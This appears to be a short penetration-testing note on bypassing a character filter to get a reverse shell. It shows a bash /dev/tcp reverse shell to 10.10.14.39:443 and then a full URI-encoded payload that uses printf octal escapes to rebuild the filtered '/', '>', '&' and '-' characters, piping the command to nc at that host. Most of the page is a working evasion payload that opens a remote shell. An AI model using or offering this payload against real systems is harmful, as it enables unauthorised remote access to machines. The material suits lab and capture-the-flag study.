Using ENV to escape Bad Characters
Characters '/ > & -' are not processed. But we want a reverse tcp one liner. We can workaround these characters using the following methods
Basically our reverse shell command /bin/bash -i >& /dev/tcp/10.10.14.39/443 0>&1 will not be executed successfully as / characters are being replaced. How do we get around this?
If Env contains a variable we can use. For example, the /
character is being escaped during our exploitation phase to get a reverse shell.
# Env contains a variable
OLDPWD=/
HOME=/
PHP_FCGI_MAX_REQUESTS=500
PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin:/usr/local/sbin
LANG=en_US.ISO8859-1
PHP_FCGI_CHILDREN=1
PWD=/var/db/rrd
Looking at the above Env values We can replace '$(HOME)'
with /
And format the '$LANG'
variable as such IN NON-BSD:

But If the OS is BSD format so we are not able to format it like above, instead we use linux printf

We can test out we will print out a reverse shell command with replaced badcharacters
# - character
a=$(printf "\55")
# / character
b=$(printf "\57")
# & character
c=$(printf "\46")
# > character
d=$(printf "\76")
For this example, since the full payload will be URI encoded, the space characters will be encoded as '+'. The reverse shell payload will now be
a=$(printf+"\55");b=$(printf+"\57");c=$(printf+"\46");d=$(printf+"\76");echo+${b}bin${b}bash+${a}i+${d}${c}+${b}dev${b}tcp${b}10.10.14.39${b}443+0${d}${c}1|nc+10.10.14.39+443
Which converts successfully to the reverse shell command that was not working previously

Last updated
Was this helpful?